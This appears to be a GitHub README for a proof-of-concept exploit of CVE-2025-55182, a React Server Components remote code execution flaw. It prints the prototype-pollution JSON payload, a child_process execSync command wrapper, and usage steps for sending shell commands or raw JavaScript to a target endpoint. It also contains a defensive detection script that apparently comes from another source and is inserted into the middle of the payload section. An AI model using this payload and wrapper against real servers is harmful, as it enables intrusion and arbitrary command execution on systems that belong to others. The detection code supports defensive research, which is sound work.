Darker-Ink/react-ssr-vulnerability

CVE-2025-55182 - React Server Components RCE POC

This is a POC for educational and security research purposes only. This vulnerability has been patched in the latest versions of the affected packages. Use this tool only on systems you own or have explicit permission to test. I am not liable for any legal actions taken against you.

Payload Construction

The exploit creates a specially crafted JSON object that abuses JavaScript's prototype chain:

{
  "then": "$1:__proto__:then",           // Pollutes the prototype chain
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": jsCode,                    // Injected malicious code
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
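
A defender-side check for the reference strings shown in the payload above, as an added example (not code from this repository or from React): it flags `$<id>:...` strings whose path segments include `__proto__`, `constructor` or `prototype`, including inside JSON nested in a string field such as `value`. The function names, the segment deny-list, the depth limit and the sample bodies are assumptions made for illustration, and the caller is assumed to have already extracted the field text from the request.

```javascript
// Added detection sketch. All names are hypothetical, not from the PoC or React.
const DANGEROUS = new Set(["__proto__", "constructor", "prototype"]);
const MAX_DEPTH = 32; // assumed limit; deeper nesting is reported, not followed

// For a "$<id>:<seg>:..." reference string, return the dangerous segments.
function dangerousSegments(s) {
  if (!s.startsWith("$") || !s.includes(":")) return [];
  return s.split(":").slice(1).filter((seg) => DANGEROUS.has(seg));
}

function tryParse(text) {
  try { return { ok: true, value: JSON.parse(text) }; }
  catch { return { ok: false }; }
}

// Walk a parsed value; strings that hold JSON are parsed and walked too,
// because the payload's "value" field nests a second JSON document.
function scanValue(node, path, findings, depth) {
  if (depth > MAX_DEPTH) { findings.push({ path, reason: "nesting exceeds MAX_DEPTH" }); return; }
  if (typeof node === "string") {
    const segs = dangerousSegments(node);
    if (segs.length) findings.push({ path, reason: "reference traverses " + segs.join(",") });
    const nested = /^\s*[{[]/.test(node) ? tryParse(node) : { ok: false };
    if (nested.ok) scanValue(nested.value, path + "<json>", findings, depth + 1);
    return;
  }
  if (node === null || typeof node !== "object") return;
  for (const [key, child] of Object.entries(node)) {
    if (DANGEROUS.has(key)) findings.push({ path: path + "." + key, reason: "dangerous key" });
    scanValue(child, path + "." + key, findings, depth + 1);
  }
}

// Entry point: raw text of one JSON request body or form field.
function scanBody(raw) {
  const findings = [];
  const parsed = tryParse(raw);
  if (parsed.ok) scanValue(parsed.value, "$root", findings, 0);
  return findings;
}

// Constructed samples. SUSPICIOUS mirrors the shape above with an inert _prefix.
const SUSPICIOUS = JSON.stringify({
  then: "$1:__proto__:then", status: "resolved_model", reason: -1,
  value: '{"then":"$B1337"}',
  _response: { _prefix: "/* inert */", _chunks: "$Q2", _formData: { get: "$1:constructor:constructor" } },
});
const BENIGN = JSON.stringify({ user: "$1:profile:name", note: "fee: $5" });
console.log(scanBody(SUSPICIOUS), scanBody(BENIGN));
```

A check like this is a stopgap for logging or request filtering; upgrading to the patched package versions is the actual fix.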

Command Wrapping

The POC supports two modes:

Standard Mode (default):

process.mainModule.require("child_process").execSync("YOUR_COMMAND");

Wraps shell commands for execution via Node.js child_process.

Raw Mode (--raw flag):

// Executes arbitrary JavaScript directly

Allows direct JavaScript code execution without shell command wrapping.

Usage

Basic Command Execution

bun run index.ts <command_file> <target_url>

Example:

# Create a command file
echo "whoami" > cmd.txt

# Execute against vulnerable endpoint
bun run index.ts cmd.txt http://localhost:3000

Raw JavaScript Mode

bun run index.ts --raw <js_file> <target_url>

Example:

# Create JavaScript payload
echo "require('fs').writeFileSync('/tmp/pwned.txt', 'RCE Success')" > payload.js

# Execute raw JavaScript
bun run index.ts --raw payload.js http://localhost:3000

Arguments

  • <file_path>: Path to file containing the command or JavaScript code
  • <target_url>: URL of the React Server Function endpoint
  • --raw: (Optional) Execute raw JavaScript instead of shell commands

Attribution

Discovered by: Lachlan Davidson
Disclosed by: The React Team & Meta Security

About

This is a POC script for CVE-2025-55182 (React SSR RCE)
